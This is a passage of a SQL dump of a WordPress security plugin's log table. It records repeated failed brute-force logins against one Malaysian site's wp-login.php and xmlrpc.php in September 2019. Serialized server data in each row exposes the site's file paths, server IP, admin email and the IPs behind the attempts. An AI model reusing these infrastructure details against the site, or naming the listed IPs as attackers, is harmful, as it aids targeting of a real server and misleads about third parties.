07:54:34',17741360,19232192,'https://bintara.com.my/wp-login.php',1,0,'14.248.83.23'),(25126,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"128.199.133.250\";s:11:\"REMOTE_PORT\";s:5:\"50286\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYMwmjeXPjITQfYLwk4UjQAAAIU\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568878746.4321\";s:12:\"REQUEST_TIME\";s:10:\"1568878746\";}}','notice','2019-09-19 07:39:08','2019-09-19 07:39:06',18257328,19555400,'https://bintara.com.my/xmlrpc.php',1,0,'128.199.133.250'),(25125,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"88\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"128.199.133.250\";s:11:\"REMOTE_PORT\";s:5:\"49852\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYMwl8@trAUOPPoD0z1KvQAAAMI\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568878743.7973\";s:12:\"REQUEST_TIME\";s:10:\"1568878743\";}}','notice','2019-09-19 07:39:05','2019-09-19 07:39:04',17738936,19229912,'https://bintara.com.my/wp-login.php',1,0,'128.199.133.250');
INSERT INTO `wpdp_itsec_logs` (`id`, `parent_id`, `module`, `code`, `data`, `type`, `timestamp`, `init_timestamp`, `memory_current`, `memory_peak`, `url`, `blog_id`, `user_id`, `remote_ip`) VALUES (25124,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"138.68.136.152\";s:11:\"REMOTE_PORT\";s:5:\"40788\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYMtix1AWtxZyz0ToGmD2AAAAAc\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568877963.4686\";s:12:\"REQUEST_TIME\";s:10:\"1568877963\";}}','notice','2019-09-19 07:26:05','2019-09-19 07:26:03',18256856,19554208,'https://bintara.com.my/xmlrpc.php',1,0,'138.68.136.152'),(25123,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"90\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"138.68.136.152\";s:11:\"REMOTE_PORT\";s:5:\"40190\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYMth9Ahg@A20WI2ffhvbwAAAQU\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568877959.4453\";s:12:\"REQUEST_TIME\";s:10:\"1568877959\";}}','notice','2019-09-19 07:26:01','2019-09-19 07:25:59',17740464,19231512,'https://bintara.com.my/wp-login.php',1,0,'138.68.136.152'),(25122,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"162.144.134.39\";s:11:\"REMOTE_PORT\";s:5:\"48424\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYMqL9d7mFxrJDg7xkLo-AAAAEM\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1568877103.508\";s:12:\"REQUEST_TIME\";s:10:\"1568877103\";}}','notice','2019-09-19 07:11:45','2019-09-19 07:11:43',18258520,19555184,'https://bintara.com.my/xmlrpc.php',1,0,'162.144.134.39'),(25120,0,'notification_center','send_scheduled','a:2:{s:13:\"notifications\";a:1:{i:0;s:6:\"digest\";}s:6:\"silent\";b:0;}','debug','2019-09-18 21:24:44','2019-09-18 21:24:41',17792920,18255576,'http://bintara.com.my/wp-login.php',1,0,'216.244.66.228'),(25121,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"89\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"162.144.134.39\";s:11:\"REMOTE_PORT\";s:5:\"47896\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYMqLNAhg@A20WI2ffhtyQAAAQU\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568877100.1152\";s:12:\"REQUEST_TIME\";s:10:\"1568877100\";}}','notice','2019-09-19 07:11:41','2019-09-19 07:11:40',17741312,19231560,'https://bintara.com.my/wp-login.php',1,0,'162.144.134.39'),(25119,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"162.214.21.81\";s:11:\"REMOTE_PORT\";s:5:\"55238\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYJpt8rWzCkhZpjT3iO4MwAAAVI\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568827831.5024\";s:12:\"REQUEST_TIME\";s:10:\"1568827831\";}}','notice','2019-09-18 17:30:33','2019-09-18 17:30:31',18259400,19556248,'https://bintara.com.my/xmlrpc.php',1,0,'162.214.21.81'),(25118,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"91\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"162.214.21.81\";s:11:\"REMOTE_PORT\";s:5:\"54638\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYJptHcOb4UlVF5wccEPhwAAAdI\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568827828.3236\";s:12:\"REQUEST_TIME\";s:10:\"1568827828\";}}','notice','2019-09-18 17:30:29','2019-09-18 17:30:28',17740952,19232232,'https://bintara.com.my/wp-login.php',1,0,'162.214.21.81'),(25117,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"47.91.229.187\";s:11:\"REMOTE_PORT\";s:5:\"58104\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYJnpsrWzCkhZpjT3iO37QAAAVY\";s:8:\"PHP_SELF\";s:11: